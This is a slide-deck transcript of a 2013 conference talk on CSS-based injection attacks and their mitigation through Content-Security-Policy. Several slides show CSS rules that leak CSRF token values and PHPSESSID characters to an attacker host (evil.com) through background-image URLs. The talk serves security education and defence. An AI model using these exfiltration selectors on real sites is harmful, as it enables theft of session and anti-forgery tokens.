Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSS (No, the _other_ "s") - CSSConf EU 2013

3c27881a0d8695811b0fa23bd794e696?s=47 Mike West
PRO
September 13, 2013

XSS (No, the _other_ "s") - CSSConf EU 2013

Cross-site scripting attacks are dangerous, and common enough that you're all probably familiar with them. Unfortunately that last word, "scripting", has ensured that our collective understanding of injection attacks remains fundamentally tied up with JavaScript. Cross-site _styling_ is actually more capable than you might expect; it's quite possible to exfiltrate sensitive data (like passwords!) without any script at all. This talk will walk through some of the cleverly malicious activity that CSS makes possible, and discuss some mechanisms for mitigating the risk that your sites and applications might be affected.

3c27881a0d8695811b0fa23bd794e696?s=128

Mike West
PRO

September 13, 2013
Tweet

Transcript

  1. XSS. (No, the other "S") Mike West https://mikewest.org G+: mkw.st/+

    Twitter: @mikewest Slides: https://mkw.st/r/cssconfeu13
  2. Content Injection is scary.

  3. <style> p { color: {{USER_COLOR}}; } </style> <p> Hello {{USER_NAME}},

    view your <a href="{{USER_URL}}">Account</a>. </p> <script> var id = {{USER_ID}}; </script> <!-- DEBUG: {{INFO}} -->
  4. scheme://host:port

  5. Problem solved!

  6. http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf goo.gl/WvqNfI

  7. http://contextis.co.uk/files/Browser_Timing_Attacks.pdf goo.gl/mnOlI6

  8. 1. Injection 2. Execution 3. Exfiltration

  9. Defacement, Phishing, etc.

  10. Steal a CSRF token: <input type="hidden" name="csrf" value="123">

  11. #csrf[value='0'] #csrf[value='1'] #csrf[value='01'] #csrf[value='11'] #csrf[value='001'] #csrf[value='101'] #csrf[value='011'] ... #csrf[value='111111111']

  12. #csrf[value='0'] { background: url(//evil.com/?csrf=0); }

  13. http://eaea.sirdarckcat.net/cssar/v2/

  14. Steal a GET parameter: http://example.com/?PHPSESSID=123456 FF-Only, sorry: https://bugs.webkit.org/show_bug.cgi?id=51172

  15. @-moz-document regexp(".*PHPSESSID=0.*") { background: url(//evil.com/?sess=0,1); } @-moz-document regexp(".*PHPSESSID=.0.*") { background:

    url(//evil.com/?sess=0,2); } ... http://html5sec.org/cssession/
  16. Steal arbitrary attributes. <a href="/" data-secret="12345">

  17. http://html5sec.org/webkit/test.html

  18. Contextual Alternatives http://ie.microsoft.com/testdrive/graphics/opentype/opentype-monotype/index.html goo.gl/qE08aW

  19. http://traumwerk.stanford.edu/philolog/2009/10/homers_odyssey_in_art_sirens_f.html

  20. None
  21. http://w3.org/TR/CSP11

  22. Content-Security-Policy: default-src 'none'; style-src https://mikewestdotorg.hasacdn.net; frame-src https://www.youtube.com https://www.speakerdeck.com; script-src https://mikewestdotorg.hasacdn.net

    https://ssl.google-analytics.com; img-src 'self' https://mikewestdotorg.hasacdn.net https://ssl.google-analytics.com; font-src https://mikewestdotorg.hasacdn.net
  23. Content-Security-Policy: default-src ...; script-src ...; object-src ...; style-src ...; img-src

    ...; media-src ...; frame-src ...; font-src ...; connect-src ...; sandbox ...; report-uri https://example.com/reporter.cgi
  24. Content-Security-Policy-Report-Only: default-src https:; report-uri https://example.com/csp-violations { "csp-report": { "document-uri": "http://example.org/page.html",

    "referrer": "http://evil.example.com/haxor.html", "blocked-uri": "http://evil.example.com/img.png", "violated-directive": "default-src 'self'", "original-policy": "...", "source-file": "http://example.com/script.js", "line-number": 10, "column-number": 11, } }
  25. <script> function handleClick() { ... } </script> <button onclick="handleClick()">Click me!</button>

    <a href="javascript:handleClick()">Click me!</a>
  26. <!-- index.html --> <script src="clickHandler.js"></script> <button class="clickr">Click me!</button> <a href="#"

    class="clickr">Click me!</a> <!-- clickHandler.js --> function handleClick() { ... } function init() { for (var e in document.querySelectorAll('.clickr')) e.addEventListener('click', handleClick); }
  27. http://www.html5rocks.com/en/tutorials/security/content-security-policy/ https://mkw.st/r/csp

  28. https://mkw.st/r/cssconfeu13 Danke! Mike West https://mikewest.org G+: mkw.st/+ Twitter: @mikewest